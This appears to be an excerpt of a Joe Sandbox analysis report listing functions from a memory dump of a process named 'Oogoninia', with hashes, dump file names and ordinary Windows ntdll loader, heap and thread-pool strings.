                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                    • API String ID: 0-1239276146
                                                                                                                                                                                    • Opcode ID: ba2ebee62b998a4a204055e4e4641ab7cb0821397be53257c10302501a7c6dd3
                                                                                                                                                                                    • Instruction ID: b6ead4bae56f1571780b4ba647c5768977b92d2d0bf021700ada85893edfd347
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba2ebee62b998a4a204055e4e4641ab7cb0821397be53257c10302501a7c6dd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8A1CE759013299BDB24CFA4CC84B99B7B0BF58358F6005EAD809EB255DB74AF81CF90
                                                                                                                                                                                    Function 325B327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}P2
                                                                                                                                                                                    • API String ID: 0-3663656162
                                                                                                                                                                                    • Opcode ID: 101ca724fc5b41bd4934992465d5b0c35a51194b82710ea8fa1b5ab18edbbeff
                                                                                                                                                                                    • Instruction ID: 3eb05a3053aa586c6c7416a7320ac2b70b90528831075879b294fc43a5651cf4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 101ca724fc5b41bd4934992465d5b0c35a51194b82710ea8fa1b5ab18edbbeff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67818D71619340AFEB11CB14C944B6BBBE8EF94754F44096DF980EB290DBB5DE04CBA2
                                                                                                                                                                                    Function 3252B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LUO2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                    • API String ID: 0-2805539372
                                                                                                                                                                                    • Opcode ID: 3b5cdd740adb9a719279f0ed4a5bfc1de9a76c00d3e3edb35a63e42559783680
                                                                                                                                                                                    • Instruction ID: 942622f88822dace48c725113a7fbcbd5a5d78d86744dcb5905a066855b30ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b5cdd740adb9a719279f0ed4a5bfc1de9a76c00d3e3edb35a63e42559783680
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D91DD75A04349DFEB15CF58D45079EBBB4EF14368F144599E814AB2D0EBB89F80CB90
                                                                                                                                                                                    Function 325263CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32580EB5
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32580DEC
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32580E72
                                                                                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32580E2F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                    • API String ID: 0-1468400865
                                                                                                                                                                                    • Opcode ID: fa3b86825f552bb6f958a467f982d5fea663e17c7b0cdd1bc9e85022ee06a1ec
                                                                                                                                                                                    • Instruction ID: 49118ea9bf8751f3a1424126a5f9110b4a569ba509a8e7386853d7fb6a05a0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa3b86825f552bb6f958a467f982d5fea663e17c7b0cdd1bc9e85022ee06a1ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71C1B19053449FD750CF14C8C5B8B7FA8AF847A4F800969FD888B286D7B5E688CBD1
                                                                                                                                                                                    Function 325190F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                    • API String ID: 2994545307-1391187441
                                                                                                                                                                                    • Opcode ID: 51e036047b3d66ed11fc2df99d29a64a0b30cf748453c5ebf8bd2c9c55ec9ee9
                                                                                                                                                                                    • Instruction ID: d30b94ee3eec5dde7cdef9ae6dab07b2c7baefefc42e48907f78563c5570389f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e036047b3d66ed11fc2df99d29a64a0b30cf748453c5ebf8bd2c9c55ec9ee9
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31F936940104EFEB01CB98DC84F9AB7B8EF84770F5144A1E815AB250DB70EB41CE60
                                                                                                                                                                                    Function 32561190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eU2
                                                                                                                                                                                    • API String ID: 0-3991691321
                                                                                                                                                                                    • Opcode ID: bd1e1b85eee06d92515a270b9dd8a52e8238508c3541db49b152d446638b0ecd
                                                                                                                                                                                    • Instruction ID: 1af1d849450ab8cf971274df24a7790827b51598aa026476f978c5c7d86ea0bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd1e1b85eee06d92515a270b9dd8a52e8238508c3541db49b152d446638b0ecd
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA316D72900219BBDB128B95CD44EFEBBB9EB84758F505425E504E7260DB74DB05CB90
                                                                                                                                                                                    Function 32527072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: e891df524a1bbec93bee0764d7186ae755637cf94568c703a0813bb5081023df
                                                                                                                                                                                    • Instruction ID: 2f9d4c4c4c86f61694f371a82be8e7e1304031282669dd805b736e33c4492d23
                                                                                                                                                                                    • Opcode Fuzzy Hash: e891df524a1bbec93bee0764d7186ae755637cf94568c703a0813bb5081023df
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51FE74A00715EFEB09CB64C884BAEBBB0BF44755F10816AE912972D0DFB4AB45CF80
                                                                                                                                                                                    Function 3252170C Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HEAP: , xrefs: 3257F6BE
                                                                                                                                                                                    • HEAP[%wZ]: , xrefs: 3257F6B1
                                                                                                                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3257F6D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 0-3178619729
                                                                                                                                                                                    • Opcode ID: 5a2a962a571e07f7d85f80caf02d9a628891564ddc195a0c72ab9de6235fab8a
                                                                                                                                                                                    • Instruction ID: a990d84446bce1aab722f52fba9f92281304b74c5254401d05349bd786cec8b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a2a962a571e07f7d85f80caf02d9a628891564ddc195a0c72ab9de6235fab8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: CB12C074A00351EFE718CF28C480B66BBA1BF45714F64C59DE895DB6C6DB70EA41CBA0
                                                                                                                                                                                    Function 325B3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                    • API String ID: 0-1168191160
                                                                                                                                                                                    • Opcode ID: 6797d732da5cea45a31062fde182992421045414a3ad57ebdfdf3453941eea93
                                                                                                                                                                                    • Instruction ID: 858ec9882220438a288aea7d30a8293e77c6fc39f25551fe51b888cb03792484
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6797d732da5cea45a31062fde182992421045414a3ad57ebdfdf3453941eea93
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF190B5A01228ABDF21CF14CC80BD9B7B5AF98754F5440E9EA09B7240EBB09F85CF55
                                                                                                                                                                                    Function 3254F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325900C7
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 32590128
                                                                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325900F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                                                                    • Opcode ID: 4ba00e1b3547b2c47a978ad99e9a80608bf8b4808add761237ecfa9ea1f44ddb
                                                                                                                                                                                    • Instruction ID: 17ca1dd8ac9456e77aa9665949353dece2b931599d616ea7873b41019a9687e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba00e1b3547b2c47a978ad99e9a80608bf8b4808add761237ecfa9ea1f44ddb
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE19F756087419FE715CF28C880B6ABBE1BF84368F500A59F5A5CB2E1DB74EA44CB42
                                                                                                                                                                                    Function 325A330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                    • API String ID: 0-2391371766
                                                                                                                                                                                    • Opcode ID: ad2533dcfaf0b81b6f3746462f1e88be916dd952cdf1af500453be386f334ad8
                                                                                                                                                                                    • Instruction ID: 11d4c8950f53ffbd6e5ae0fab82243e00d4018824a4718a4c49204ab1ecc55ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2533dcfaf0b81b6f3746462f1e88be916dd952cdf1af500453be386f334ad8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB1C275605341BFE312CF54C991B5FB7E8AB98758F40482AFE40DB290DBB4EA44CB92
                                                                                                                                                                                    Function 3251A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                    • API String ID: 0-2779062949
                                                                                                                                                                                    • Opcode ID: 6560e3be8d03aca7f3ca1c0b9c26cfd7a3d528ad2ed63a43d95dd9f471b33ce5
                                                                                                                                                                                    • Instruction ID: d6183c7ae6107d3fedafba631f03c1e77a2db6a070044a9ac5fd7010f216cad7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6560e3be8d03aca7f3ca1c0b9c26cfd7a3d528ad2ed63a43d95dd9f471b33ce5
                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA17C759416299BEB21DF28CC88BEEB7B8EF44705F1005EAE908A7250DB759F84CF50
                                                                                                                                                                                    Function 325FB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • TargetNtPath, xrefs: 325FB3AF
                                                                                                                                                                                    • GlobalizationUserSettings, xrefs: 325FB3B4
                                                                                                                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325FB3AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                    • API String ID: 0-505981995
                                                                                                                                                                                    • Opcode ID: 7164d1b62e2a3f666330116b920cb578e96545c550d48c8dfa1d9e41b0fbf864
                                                                                                                                                                                    • Instruction ID: 358992e120737cc1a481beea30386880da94fae1e8438ca9a1d4cca3df1de6b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7164d1b62e2a3f666330116b920cb578e96545c550d48c8dfa1d9e41b0fbf864
                                                                                                                                                                                    • Instruction Fuzzy Hash: B761A072941229FBDB21DF54DC88BDAB7B8AB48714F4101E5EA08A7290DB74DF84CF90
                                                                                                                                                                                    Function 3251F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HEAP: , xrefs: 3257E442
                                                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3257E455
                                                                                                                                                                                    • HEAP[%wZ]: , xrefs: 3257E435
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                    • API String ID: 0-1340214556
                                                                                                                                                                                    • Opcode ID: 5591482903e3b4f4e76b97adb7a54a943d847530071cbc9ff38aefa0367682dd
                                                                                                                                                                                    • Instruction ID: 8ae886fff0bfaa264a46e614edcc7f60383e902d1fe05337aa37dc062dee2741
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5591482903e3b4f4e76b97adb7a54a943d847530071cbc9ff38aefa0367682dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4351EE35680784AFFB16CBA8C894F9ABBE8EF44354F4444A5E540CB692DB74FB40CB90
                                                                                                                                                                                    Function 32541514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 3258A3A7
                                                                                                                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 3258A396
                                                                                                                                                                                    • LdrpCompleteMapModule, xrefs: 3258A39D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                    • API String ID: 0-1676968949
                                                                                                                                                                                    • Opcode ID: bcbd3bbbdd0c9d73619da90f1d377cd46209902d56d5cd4e97d79afc9cade849
                                                                                                                                                                                    • Instruction ID: b05cbf56afd11752b98b8e90051215ce7c448fad965c0d2759a9820acefde81b
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcbd3bbbdd0c9d73619da90f1d377cd46209902d56d5cd4e97d79afc9cade849
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E513474B007419BE712CB69C984B9ABBE4EF44B54F5085A4E9629B2E1DFB4EF40CF40
                                                                                                                                                                                    Function 325CD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HEAP: , xrefs: 325CD79F
                                                                                                                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 325CD7B2
                                                                                                                                                                                    • HEAP[%wZ]: , xrefs: 325CD792
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                    • API String ID: 0-3815128232
                                                                                                                                                                                    • Opcode ID: 9d3a8626b44d64022744f310e90b3e8062370db23bf5ed7210bd95fd141b054a
                                                                                                                                                                                    • Instruction ID: df7710fea81f0925548fa186fbf6f197fba893903c64a3820f41cfabe661f4a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d3a8626b44d64022744f310e90b3e8062370db23bf5ed7210bd95fd141b054a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 225126781023709AF314DA69C84077277E1DF85288F514C6EE4C5CB585FA3AEA87DB60
                                                                                                                                                                                    Function 3252A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • @SO2, xrefs: 3252A268
                                                                                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 3252A21B
                                                                                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 3252A229
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @SO2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                    • API String ID: 0-3694217038
                                                                                                                                                                                    • Opcode ID: 82d61481a50bc0cc820b844ed8af78114e2107992c06980a842568a5e17a63ad
                                                                                                                                                                                    • Instruction ID: d45204b630d69b4b63feee1ae94b446c091c301e3522c49bb80d410430ccf843
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82d61481a50bc0cc820b844ed8af78114e2107992c06980a842568a5e17a63ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741BC75700784DFEB06CF99C450B5A7BB4EF85754F2144A5EC04DB2E0EAB6DA80CB10
                                                                                                                                                                                    Function 325AB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • @, xrefs: 325AB2F0
                                                                                                                                                                                    • GlobalFlag, xrefs: 325AB30F
                                                                                                                                                                                    • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 325AB2B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                    • API String ID: 0-4192008846
                                                                                                                                                                                    • Opcode ID: aaf8bba205e516b689642d0cf05cfcb90fa51336f993e8272157bc788bf43b17
                                                                                                                                                                                    • Instruction ID: 490f82863ff2e830ff86b063f3c139b2c17b1bf3a7a90d949706702facbae1ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: aaf8bba205e516b689642d0cf05cfcb90fa51336f993e8272157bc788bf43b17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38315CB1D10209AEDB11DF94DC91BEEBBBCEF54748F80046AE601E7240DBB49B44CB90
